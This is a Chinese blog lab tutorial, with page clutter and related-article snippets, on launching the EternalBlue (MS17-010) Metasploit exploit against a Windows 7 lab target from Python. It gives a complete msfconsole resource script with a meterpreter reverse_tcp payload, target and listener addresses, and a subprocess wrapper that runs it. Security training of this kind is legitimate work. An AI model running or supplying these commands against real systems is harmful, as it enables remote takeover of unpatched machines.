w30使用python调用shell脚本

最新推荐文章于 2024-04-17 03:54:55 发布
最新推荐文章于 2024-04-17 03:54:55 发布
阅读量251 收藏 5
点赞数 2
文章标签: python 网络 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxcz123123421/article/details/136432856
版权

使用python脚本去实现永恒之蓝漏洞攻击

实验环境

攻击工具:python+msfconsole 
靶场:win7 和 kali

实验目的

演示python脚本调用过程

实验步骤

1.写一个永恒之蓝的攻击脚本,定义为blue.rc

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.74.128
set lhost 192.168.74.129
run

use exploit :设置msf的攻击载荷模块,此处设置永恒之蓝模块
set payload :当漏洞利用成功时,此处reverse_tcp是指启动一个反向的tcp会话。
set RHOST : 指定目标地址(受害者)
set lhost : 指定攻击者地址
run : 运行
2.执行该脚本
msfconsole -r ./blue.rc
在这里插入图片描述
3.脚本执行成功,现在要通过python来执行,在python中写入如下代码

import subprocess

if __name__ == '__main__':

    subprocess.Popen("msfconsole -r ./blue.rc",shell=True).wait();
    //等同于subprocess.call("msfconsole -r ./blue.rc",shell=True)

4.执行脚本 python blue.py
在这里插入图片描述

杭城我最帅
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常用shell 脚本,dos攻击防范,
05-26
常用shell脚本, Dos攻击防范(自动屏蔽攻击IP).sh 一键部署等等 Linux系统发送告警脚本.sh MySQL数据库备份单循环.sh MySQL数据库备份多循环.sh nginx 访问访问日志按天切割.sh nginx.conf nginx访问日志分析脚本.sh shell.txt 一键查看服务器资源利用率.sh 一键部署LNMP网站平台脚本.sh 下载必看.txt 批量主机远程执行命令脚本.sh 批量创建100用户并设置密码脚本.sh 批量检测网站是否异常脚本.sh 找出占用CPU 内存过高的进程脚本.sh 更多精品教程.url 服务器系统配置初始化脚本.sh 本教程由我爱学it提供.url 查看网卡实时流量脚本.sh 监控100台服务器磁盘利用率脚本.sh 监控MySQL主从同步状态是否异常脚本.sh 目录文件变化监控和实时文件同步.sh 自动发布Java项目(Tomcat).sh 自动发布PHP项目脚本.sh
web 防攻击shell脚本
weixin_30727835的博客
10-16 103
统计nginx日志,当单个ip在10秒钟内访问 /account/sendPhoneCode次数超过5次,就禁用这个ip,正常用户不可能有么大的访问量 #!/bin/bash #write: lijing QQ 858080796 #date: 20160528 v2.0 #description:拦截非法IP #定义变量 RETVAL=0 Date=$(date '+%Y-%m-%...
linux脚本攻击,一个防DDOS攻击的SHELL脚本
weixin_34552166的博客
05-01 666
当遇到DDOS的攻击时,可以考虑封IP来源来暂时解决,但IP源变化多端,光靠手工添加不现实,所以写了个脚本,以实现自动添加。有需要的朋友,参考下吧。1,防范ddos攻击的脚本mkdir /root/binvi /root/bin/dropip.sh复制代码 代码示例:#!/bin/bash/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk ...
使用 shell_防攻击使用shell脚本集合
weixin_42232139的博客
01-13 161
防攻击使用脚本主要是在前端服务器(nginx或者lvs使用),其中涉及到的技术shell、iptables以及linux系统命令相关检查iptables CC IP 访问排名 #!/bin/bash num=100 //设置最高连接的值 IP=`netstat -an |grep ^tcp.*:80|egrep -v 'LISTEN|127.0.0.1'...
Shell脚本防攻击一例
jinyeweiyang的专栏
10-17 616
http://yaozb.blog.51cto.com/2762349/882176               不知道得罪了哪路神仙,收到nagios报警,发现有个网站有CC攻击。看样子,量还不小,把服务器的负载都弄到40+了,虽然网站还能打开,但打开也是非常的缓慢。如果不是配置高点,估计服务器早就挂掉了。看来又是不一个不眠之夜了。 迅速查看一下ngi
W30 6S meeting Report
07-29
在"W30 6S meeting Report"中,我们可以看到一系列关于6S审计的问题和案例,这反映了在CanSemi的生产过程中存在的一些不足。 首先,6S审计报告提到了无尘室复训的问题,特别是无尘服挂放不标准。这可能涉及到员工对...
TX3 Mini&MAX SPEC W30 2019 PDF.pdf
08-11
TX3 Mini&MAX SPEC W30 2019 PDF.pdf
sea-w30-uge:Unix和Git代码研究员
05-25
使用其操作系统的最新,稳定,更新的版本 具有正常运行的屏幕,键盘和触控板 有足够的可用硬盘空间和内存 可以可靠地连接到无线网络 2.完成“ Console Foundations”和“ Git Basics”在线课程 提示: Treehouse...
HRNet-Image-Classification:在ImageNet上训练HRNet模型
05-25
使用这两个小型模型的细分结果也可从。 TensoFlow实现可在。 谢谢 ! 修复问题后启用了ONNX导出。 谢谢!介绍这是的官方代码。 我们使用下图所示的分类头来扩充HRNet。 首先,将四分辨率特征图输入瓶颈,并将输出...
家用电器行业周报W30:20Q2大家电市场变化及龙头业绩测算.pdf
07-10
家用电器行业周报W30:20Q2大家电市场变化及龙头业绩测算.pdf
记录一次 先手工 再python脚本 验证永恒之蓝ms17-10漏洞
wh1te 小白的博客
10-19 4772
查看资料 ms17-10漏洞利用的步骤大致如下 打开msf use auxiliary/scanner/smb/smb_ms17_010 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set ...
html5 防止脚本攻击,shell防ddos攻击脚本(二)
weixin_36217616的博客
06-22 202
在上一篇shell防ddos攻击脚本(一)中,我给大家发了个脚本,那只是针对单机的,如果是在负载均衡下的话,很容易把自己的服务器ip给误封,所以这篇文章就给大家发个可以添加白名单的shell脚本.系统:centos 5.9 64位脚本内容:vi ip-dos-cc.sh#!/bin/bashnetstat -an| grep :80 |grep -v -E '127.0|0.0|10.0'|awk...
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 9050
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 3939
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
几个不错的Shell脚本
Lv的程序人生
03-05 594
【例子:001】判断输入为数字,字符或其他 #!/bin/bash   read -p "Enter a number or string here:" input      case $input in      [0-9]) echo -e "Good job, Your input is a numberic! \n" ;;   [a-zA-Z]) echo -e "
9 个实用 shell 脚本,快来看看_千峰教育shell脚本,2024年最新2024-2024历年华为跳动网络安全面试真题解析
最新发布
2301_78416543的博客
04-17 584
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。# 禁止定时任务向发送邮件。# 历史命令显示操作时间。# 设置时区并同步时间。
超牛逼!100 个开箱即用的 Shell 脚本,拿好了~
民工哥的博客
04-30 3532
点击下方公众号「关注」和「星标」回复“1024”获取独家整理的学习资料!shell脚本是帮助程序员和系统管理员完成费时费力的枯燥工作的利器,是与计算机交互并管理文件和系统操作的有效方式。区...
永恒之黑和永恒之蓝 完整复现流程
Continuejww的博客
09-19 1115
充当攻击机的机器是kali,另外需要关闭防火墙策略。
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
wwwwyyyrre的博客
04-22 2426
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
HF2211S_EW1X_PW1X_Wport-W30 操作与硬件指南
4. **串口设置**:指导用户如何使用串口工具SECURECRT设置串口参数,并进入CLI指令模式,进行设备的控制和调试。 5. **测试网络**:这部分详尽地列出了各种网络模式下的测试方法,如AP无线网络模式和STA无线网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值